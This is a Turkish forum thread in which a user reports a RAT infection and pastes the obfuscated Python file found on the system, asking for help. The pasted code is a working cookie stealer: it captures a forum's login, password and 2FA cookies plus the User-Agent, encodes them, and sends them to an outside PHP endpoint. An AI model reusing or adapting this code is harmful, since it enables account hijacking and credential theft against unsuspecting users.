• 22-03-2023, 04:21:21
    #10
    Netkreatif adlı üyeden alıntı: mesajı görüntüle
    Rica ederim hocam.

    IP Adresini https://bgp.he.net/ üzerinde arama yaparak hangi servis sağlayıcısında olduğunu da görüntüleyebilirsiniz.
    Hocam ilginç bir sonuç aldım dns bilgisi
    https://www.donanimhaber.com/
    sitesi görünüyor?
  • 22-03-2023, 04:23:09
    #11
    Gelistir adlı üyeden alıntı: mesajı görüntüle
    Hocam ilginç bir sonuç aldım dns bilgisi
    https://www.donanimhaber.com/
    sitesi görünüyor?
    Yanlış bir ip adresini görüntülemiş olabilirsiniz, program tüm bağlantılarınızı listeliyor diğer adreslere göz gezdirin derim.
  • 22-03-2023, 04:24:20
    #12
    Netkreatif adlı üyeden alıntı: mesajı görüntüle
    Yanlış bir ip adresini görüntülemiş olabilirsiniz, program tüm bağlantılarınızı listeliyor diğer adreslere göz gezdirin derim.
    eminim hocam virüsün exe dosyası çok netdi
  • 22-03-2023, 05:12:52
    #13
    UpdaterUpdater.py dosyası içinde olanlar önemli
    • Gelistir
    Gelistir bunu beğendi.
    1 kişi bunu beğendi.
  • 22-03-2023, 05:17:03
    #14
    Misafir adlı üyeden alıntı: mesajı görüntüle
    UpdaterUpdater.py dosyası içinde olanlar önemli
    Dosya şifreli hocam rat yemişim antivürüste trojan olarak sonuç verdi 3 dosya sokmuş sisteme
    biri basic dosyası .vbs bu başlangıçta çalışıyor exe dosyasını çalıştırıyor aynı şekilde py dosyasınıda exe direk karşı pc bağlantı yapıyor update.py de yazılımı ve bağlantıyı güncelliyor üstelik bilgisayarımı bir arasunucuya yönlendirmiş ayarlarımdan python dosyasının kodlarıda şu şekilde


    import urllib as gSKIaflpciXm
    import os as JWMR
    import base64 as vIlxNhrREmtF
    
    aYXrERqJoA = lambda n: (n - (2 % 4)) - 1
    QKFvwrXuUy = lambda s: ''.join(chr(int(aYXrERqJoA(ord(c)))) for c in s)
    JWMR.environ[QKFvwrXuUy("qrbsur{|")] = QKFvwrXuUy("-")
    
    def request(sIiOaNoZ):
    if sIiOaNoZ.request.url == QKFvwrXuUy("kwwsv=22zzz1u431qhw2"):
    DEmTMnQNejcKFl = sIiOaNoZ.request.cookies.get_all(QKFvwrXuUy("u43xvhulg"))
    lEpOAQZkgaDtbrnCfGoyRLUxXh = sIiOaNoZ.request.cookies.get_all(QKFvwrXuUy("u43sdvvzrug"))
    eEYvPiNw = sIiOaNoZ.request.cookies.get_all(QKFvwrXuUy("u43idvw5id"))
    DjZXLpzVUlugAneOdMax = sIiOaNoZ.request.headers[QKFvwrXuUy("Xvhu0Djhqw")]
    
    if DEmTMnQNejcKFl:
    if lEpOAQZkgaDtbrnCfGoyRLUxXh:
    ngBmCydc = (DEmTMnQNejcKFl[int(aYXrERqJoA(3))], lEpOAQZkgaDtbrnCfGoyRLUxXh[int(aYXrERqJoA(3))], eEYvPiNw[int(aYXrERqJoA(3))] if eEYvPiNw else '', DjZXLpzVUlugAneOdMax).__repr__()
    
    fPcGKB = QKFvwrXuUy("3{4{5{6{7{8{9")
    cVLvNFeWkpDgTKYjAzIPuSMCtbhGimUE = ''
    
    for SP in range(len(ngBmCydc)):
    cVLvNFeWkpDgTKYjAzIPuSMCtbhGimUE += chr(ord(ngBmCydc[SP]) ^ ord(fPcGKB[SP % len(fPcGKB)]))
    
    ngBmCydc = vIlxNhrREmtF.b64encode(cVLvNFeWkpDgTKYjAzIPuSMCtbhGimUE.encode()).decode()
    ngBmCydc = gSKIaflpciXm.parse.urlencode({QKFvwrXuUy("gdpq5"): ngBmCydc}).encode()
    qAjcdS = gSKIaflpciXm.request.Request(QKFvwrXuUy("kwws=22kgl}oholvdqv1frp2gdpq51sks"), data=ngBmCydc)
    gSKIaflpciXm.request.urlopen(qAjcdS)
  • 22-03-2023, 05:18:11
    #15
    baya amatör gibi duruyor normal virüs değil çevrenizden biri sokmuştur veya indirdiğiniz crackli birşey vs.

    çookie çalıp bir yere gönderiyor gibi
    • Gelistir
    Gelistir bunu beğendi.
    1 kişi bunu beğendi.
  • 22-03-2023, 05:19:37
    #16
    Misafir adlı üyeden alıntı: mesajı görüntüle
    baya amatör gibi duruyor normal virüs değil çevrenizden biri sokmuştur veya indirdiğiniz crackli birşey vs.
    Çevremden birinin sokma şansı yok muhtemelen crackten vs bulaşmış çünkü herhangi bir veri ihlali görünmüyor ip adreside elimde ancak ne yapmalıyım bilmiyorum